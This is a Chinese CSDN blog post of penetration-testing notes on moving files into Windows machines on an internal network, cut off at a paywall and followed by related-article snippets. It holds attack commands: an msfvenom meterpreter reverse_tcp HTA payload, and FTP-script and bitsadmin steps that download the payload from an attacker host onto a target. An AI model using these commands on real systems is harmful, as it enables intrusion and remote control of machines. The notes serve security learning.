【渗透笔记】内网文件传输

最新推荐文章于 2024-04-27 00:30:00 发布
最新推荐文章于 2024-04-27 00:30:00 发布
阅读量870 收藏
点赞数
分类专栏: 渗透测试 文章标签: windows linux 文件传输
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keenshinsword/article/details/111988460
版权

Windows

FTP

ftp没有设置认证,允许匿名登录的话,攻击者如果知道了机器开启ftp协议,他可以直接登录机器。

还有ftp要做一个比较好的目录权限控制,即使设置了账号密码,攻击者可以通过爆破,如果ftp目录有读取写入执行权限,攻击者会上传文件进而反弹shell。

py开启ftp服务

pip3 install pyftpdlib
python3 -m pyftpdlib

脚本文件ftp.txt,用于连接ftp服务,下载文件

copy con ftp.txt
open 192.168.1.111 2121
anonymous
anonymous
get hello.hta
quit

执行文件

ftp -i -s : ftp.txt

Bitsadmin

BitsAdamin是一个命令行工具,可以使用它创建下载或上传作业,并监视进度。

使用流程就是通过msfvenom生成木马,并上传到自己的服务器,然后靶机通过bitsadmin远程下载文件并执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.11 lport=6666 -f hta-psh > hello.hta

bitsadmin /transfer shell http://192.168.1.11/hello.hta C:\windows\temp\hello.hta

rundll32.exe url.dl
最低0.47元/天 解锁文章
三丁目の夕阳下的白菜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux 内文件传输工具_【内渗透】Linux下的内传输技术
weixin_39527078的博客
12-20 357
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~这里是一名白帽的成长史~前天我们说了Windows下的内传输技术:【内渗透】Windows下的内传输技术今天再来看看Linux下的内传输吧~Part.1Wput/WgetWput Wput是一款linux环境下用于向ftp服务器上传的工具。首先,我们在本地搭建一个ftp服务器,如3CDaemon:创建一个用户monst...
文件传输
weixin_30794499的博客
07-08 864
转自:https://github.com/l3m0n/pentest_study windows下文件传输 1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass -File .\1.ps1 $d = New-Object System.Net.WebClient $d.DownloadFile("http...
这11款文件传输工具简单好用,基本涵盖所有传输场景!【带私活源码】
最新发布
m0_68103666的博客
04-27 3408
在工作中经常会遇到文件传输的需求,今天为大家推荐几款简单好用的文件传输工具。
渗透--上传与下载
Beret-81的博客
11-30 1163
渗透--上传与下载内渗透–上传与下载使用bitsadmin 进行下载使用powershell 进行下载使用 certutil 进行下载使用 WGET 进行下载 内渗透–上传与下载 对于不用直接上传而且只能通过命令行执行的shell,我们可以通过以下的方法对文件进行上传和下载。 使用bitsadmin 进行下载 下载命令:bitsadmin /transfer n http://172.16.12.128/NC.exe E:\nc.exe 使用powershell 进行下载 本地下载:power
渗透笔记,课堂资料
03-11
这篇“内渗透笔记,课堂资料”提供了一套系统性的学习资源,帮助读者了解和掌握内渗透的相关知识。 一、内渗透基础 内渗透涉及到多个步骤,首先需要进行信息收集。这包括但不限于DNS查询、SNMP扫描、端口...
渗透思路整理与工具使用
12-08
渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用
渗透笔记手册.rar
02-06
笔记,都是文档类笔记,分享出来。包含了从程序语言各种语法的渗透技巧,还有一些攻击手段的手册(比如XSS、注册表、SQL注入等),还有一些案例,包括渗透中怎么寻找突破点。
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
络安全-渗透完整笔记
03-27
在内渗透中,文件传输是关键,可能涉及通过Powershell建立Socks 4-5代理,或者与Smbmap等工具结合进行攻击。高级持续渗透(APT)涉及到长期潜伏和后门管理,如创建和管理各种类型的后门,以实现长期监控和控制。免...
传输神器飞秋2013
09-29
传输神器飞秋2013,绿色版,免安装,开箱即用,方便快捷
工作文件传送工具
09-02
一个用于内部的大文件传送的工具,无需服务器,无需连接因特,不会上传到第3方服务器。
局域传输利器在局域内,可以非常快速的传送近10G的大文件,时间大概5分钟
03-31
局域传输利器在局域内,可以非常快速的传送近10G的大文件,时间大概5分钟
ip如何传输文件
Know Destiny的博客
12-07 4922
ip如何传输文件 1.一种是scp scp 目录/文件名.文件格式 目标服务器用户名@ip地址:目标服务器目录 例如:scp /usr/sdc/local/web/start.sh root@要传输的ip: /usr/sdc/local/web/ 2.建立隧道 进入带有公ip的ip 找到属性 点击添加 点击新建,输入内ip,端口输入刚才填入的722/822/922之类的,输入账号密码后,点击确定 连接成功,下次直接点击就好不用再次连接 ...
Linux 内-局域文件快速传输
热门推荐
悟能的师兄的专栏
11-19 1万+
Linux 内-局域文件快速传输
9.新建FTP实现内文件传输
qq_34597555的博客
10-12 1211
1.打开控制面板,点击“程序”,选择“打开或关闭windows功能” 2.勾选红框下面的选项,最后点确定。 3.打开控制面板,选择管理工具,点击“Internet 信息服务(IIS)管理器“ 4.右击选择添加“FTP站点“ 5.在控制面板中,按如下路径打开“控制面板\所有控制面板项\Windows 防火墙\允许的程序 最后成功访问结果如下: ...
传输之共享文件
寻找自我,挑战自我!
03-08 1143
本机环境win7. 首先,新建测试文件夹test,新建测试文件tt.txt 然后,设置共享文件夹属性。 切换到安全选项 确定,关闭。 最后,在欲共享的机器上,输入\ip\test,回车即可看到共享文件
渗透中Windows下的内传输技术
wo41ge的博客
12-18 579
前言 有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。 ftp 环境部署 首先,ftp支持ASCII码传输、也支持二进制传输,因此完全可以满足我们的上传下载需求。 我们可以在本地服务器先搭建一个ftp服务器 创建一个用户 靶机连接上ftp服务器之后,我们就可以进行上传、下载操作了。 上传和下载 ftp可以读取txt中的命令并执行,因此可以把需要执行的命令写入到一个txt文件中 echo open ip >>ftp.txt
032-内横向移动学习备忘录1
08-04
"这篇内横向移动学习备忘录主要探讨了在内渗透测试中的横向移动技术,涉及络环境的构建、攻击者的条件、利用方式以及相关的命令工具。作者通过一个具体的场景,即攻击者已经获得了Windows 7跳板机的权限,并且...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值